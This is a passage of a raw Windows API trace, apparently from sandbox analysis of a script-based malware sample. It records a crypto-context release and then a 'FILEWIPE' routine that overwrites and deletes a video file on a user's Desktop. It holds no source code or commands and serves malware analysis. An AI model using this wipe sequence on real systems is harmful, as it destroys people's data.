lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.960] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.960] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.960] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0161.960] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.960] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0161.961] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.961] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.961] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.961] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.961] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.961] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.961] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.961] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.961] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.961] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.961] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.961] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.961] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0161.961] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.961] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.961] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.961] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.961] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.968] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.968] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0161.968] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.968] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.968] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.968] FreeLibrary (hLibModule=0x74f20000) returned 1 [0161.968] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.968] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.968] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.970] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.972] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.973] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.973] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0161.973] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.975] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.976] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab10d10, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xf7a7c0f0, ftLastAccessTime.dwHighDateTime=0x1d5de94, ftLastWriteTime.dwLowDateTime=0xf7a7c0f0, ftLastWriteTime.dwHighDateTime=0x1d5de94, nFileSizeHigh=0x0, nFileSizeLow=0x13f6b, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Iu4ghlu.mp4", cAlternateFileName="")) returned 0x90ae18 [0161.976] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0161.976] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.976] CharLowerBuffW (in: lpsz="byte[81771]", cchLength=0xb | out: lpsz="byte[81771]") returned 0xb [0161.977] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.977] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0161.977] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.977] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0161.977] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0161.978] FreeLibrary (hLibModule=0x75c90000) returned 1 [0161.978] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.978] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.978] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0161.978] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.979] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iu4ghlu.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0161.979] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.979] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.979] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.979] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.979] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0161.979] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.979] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.979] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.980] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.980] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.980] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.980] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.980] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.980] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0161.980] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.980] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.980] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.981] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.981] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.981] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.981] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.981] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4", lpFilePart=0x0) returned 0x31 [0161.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.981] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iu4ghlu.mp4")) returned 0x20 [0161.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0161.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0161.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fed50 | out: hHeap=0x8a0000) returned 1 [0161.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0161.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0161.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.983] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab10d10, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xf7a7c0f0, ftLastAccessTime.dwHighDateTime=0x1d5de94, ftLastWriteTime.dwLowDateTime=0x5f996e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x13f6b, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Iu4ghlu.mp4", cAlternateFileName="")) returned 0x90ae18 [0161.983] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iu4ghlu.mp4")) returned 1 [0161.985] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab10d10, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xf7a7c0f0, ftLastAccessTime.dwHighDateTime=0x1d5de94, ftLastWriteTime.dwLowDateTime=0x5f996e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x13f6b, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Iu4ghlu.mp4", cAlternateFileName="")) returned 0 [0161.985] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0161.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0161.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0161.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0161.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0161.985] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0161.987] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0161.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0161.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0161.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0161.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0161.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 